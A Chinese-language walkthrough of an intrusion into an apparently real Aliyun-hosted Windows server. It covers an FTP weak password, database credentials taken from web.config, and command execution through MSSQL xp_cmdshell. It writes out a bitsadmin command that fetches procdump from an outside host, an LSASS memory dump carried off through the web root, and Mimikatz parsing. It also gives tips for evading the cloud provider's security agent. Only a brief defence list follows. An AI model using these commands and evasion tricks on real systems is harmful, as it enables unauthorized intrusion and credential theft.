FTP渗透实战：从弱口令到获取系统权限

信息收集阶段

1. 目标识别：

   • IP地址：118.19.xx.xx（阿里云服务器）
   • 开放端口：21(FTP)、22(SSH)、80(HTTP)、81、1433(MSSQL)、3389(RDP)、8888等

2. 服务指纹识别：

   • 81端口运行Serv-U FTP软件
   • 8888端口运行ASP.NET Web应用（login.aspx）

初始入侵

1. FTP弱口令利用：

   • 发现FTP弱口令：ftp/ftp
   • 成功登录后找到敏感文件web.config，其中包含：
     • SQL Server数据库连接信息
     • 可能的凭据信息

2. 数据库连接：

   • 使用web.config中发现的凭据连接MSSQL服务(1433端口)

权限提升

1. 启用xp_cmdshell：

   exec sp_configure 'show advanced options',1;reconfigure;
   exec sp_configure 'xp_cmdshell',1;reconfigure;
   

2. 命令执行测试：

   exec master.dbo.xp_cmdshell 'whoami';
   

3. 绕过阿里云防护：

   • 发现aliyundun.exe进程（阿里云安全防护）
   • 尝试激活guest用户并添加到管理员组失败
   • 改用LSASS内存dump方式获取凭据

获取Web路径

1. 查找网站路径：

   exec master.dbo.xp_cmdshell 'cd /d E: && dir /b /s Logon.aspx';
   

   • 找到绝对路径：E:\Program Files\DESS.Web\

凭证获取

1. 下载Procdump工具：

   exec master.dbo.xp_cmdshell 'bitsadmin /transfer myDownLoadJob /download /priority normal "http://144.34.xxx.xxx/procdump64.exe" "C:\\Windows\\system32\\procdump.exe"';
   

2. 导出LSASS内存：

   exec master.dbo.xp_cmdshell 'procdump.exe -accepteula -ma lsass.exe lsass.dmp';
   

3. 转移dump文件：

   exec master.dbo.xp_cmdshell 'copy lsass.dmp "E:\Program Files\DESS.Web\tmp.txt"';
   

   • 注意：路径包含空格时必须使用双引号

4. 下载并解析：

   • 通过Web访问tmp.txt下载文件
   • 本地使用Mimikatz解析获取凭据

关键技巧总结

1. 静默渗透：

   • 避免触发安全警报
   • 不进行恶意扫描或挂马

2. 路径处理：

   • Windows路径包含空格时必须使用双引号

3. 工具使用：

   • 使用bitsadmin进行文件下载（避免直接下载可能被拦截）
   • 使用Procdump而非直接运行Mimikatz（绕过部分防护）

4. 防御规避：

   • 识别并绕过云安全防护（aliyundun.exe）
   • 采用LSASS内存dump而非直接添加用户

防御建议

1. 禁用FTP匿名登录
2. 加强数据库安全配置（禁用xp_cmdshell）
3. 定期检查服务器上的异常进程
4. 限制数据库账户权限
5. 监控LSASS进程的异常访问
6. 实施Web目录访问控制
7. 禁用不必要的服务和端口